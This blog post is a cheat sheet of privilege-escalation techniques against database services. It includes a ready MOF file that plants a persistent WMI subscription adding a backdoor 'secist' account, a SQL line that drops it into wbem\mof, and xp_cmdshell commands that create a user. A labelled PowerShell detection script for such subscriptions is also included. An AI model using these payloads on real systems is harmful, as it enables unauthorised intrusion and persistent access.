Intranet Privilege Escalation: Services
Posted by drac4ry
Service privilege escalation

UDF privilege escalation
- Requires file-write permission on the database server, and single quotes must not be filtered
- Windows
  - MySQL version < 5.1: the UDF is exported to the system directory C:/WINDOWS/SYSTEM32/
  - MySQL version > 5.1: the UDF is exported to the install path MYSQL\Lib\Plugin
- Linux
  - /usr/lib/mysql/plugin
MOF privilege escalation
- Windows only
- Steps
  - 1. Find a writable directory and upload the MOF file
  - 2. Run the following SQL statement; the command inside the MOF file is then executed
    - select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
  - mofcomp.exe xxx.mof compiles and loads the MOF file
  - Alternatively, call the CompileFile method of the IMofCompiler interface
#pragma namespace("\\\\.\\root\\subscription")

// Filter: fires once a minute, whenever the local clock's seconds value is 5
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript executed by the WMI service (running as SYSTEM) each time the filter fires
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
        "var WSH = new ActiveXObject(\"WScript.Shell\"); WSH.run(\"net.exe user secist 123 /add\")";
};

// Binding: links the filter to the consumer; this is the persistent WMI subscription
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
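Defender's check for the artifact this MOF leaves behind (an added example, not part of the original post): enumerate every permanent WMI event subscription in root\subscription, flag the ones whose consumer runs script or a command line, and list recently written files under the wbem\mof directory the page drops nullevt.mof into. Assumes PowerShell 3 or later with the CIM cmdlets, run elevated on the host being inspected; the output fields are my own.

```powershell
# Added detection example: permanent WMI subscriptions are the mechanism the
# nullevt.mof above abuses. Legitimate Windows installs carry very few of them
# (e.g. the SCM Event Log Filter/Consumer pair), so every binding is worth reading.
param([int]$Days = 7)   # look-back window for files in the wbem\mof directory

$ns        = 'root\subscription'
$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
$consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer   # base class: returns all concrete consumer types
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

foreach ($b in $bindings) {
    # Filter and Consumer are object references; resolve them so each binding
    # is reported together with the query that triggers it and what it executes.
    $f = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }
    $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
    $type = $c.CimClass.CimClassName

    # Only these two consumer classes execute attacker-controlled code.
    $payload = switch ($type) {
        'ActiveScriptEventConsumer' { "$($c.ScriptingEngine): $($c.ScriptText)$($c.ScriptFileName)" }
        'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)" }
        default                     { '(non-executing consumer)' }
    }

    [pscustomobject]@{
        Filter     = $f.Name
        Query      = $f.Query
        Consumer   = $c.Name
        Type       = $type
        Payload    = $payload
        Suspicious = $type -in 'ActiveScriptEventConsumer', 'CommandLineEventConsumer'
    }
}

# The page writes nullevt.mof into System32\wbem\mof. Automatic compilation from
# that directory only exists on XP/2003, but the directory (and its good\ / bad\
# subfolders) is still where dropped MOF files end up, so recent writes are a lead.
$mofDir = Join-Path $env:SystemRoot 'System32\wbem\mof'
Get-ChildItem -Path $mofDir -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-$Days) } |
    Select-Object FullName, LastWriteTime
```

Any row with Suspicious set to True, or a binding whose filter polls Win32_LocalTime, should be investigated and the subscription removed with Remove-CimInstance once confirmed.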
MSSQL
- xp_cmdshell
  - Enable:
    EXEC sp_configure 'show advanced options',1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell',1;
    RECONFIGURE;
  - exec xp_cmdshell 'net user test test /add'
- Enable:
  - xp_regwrite
  - xp_regread

Tomcat
- Weak passwords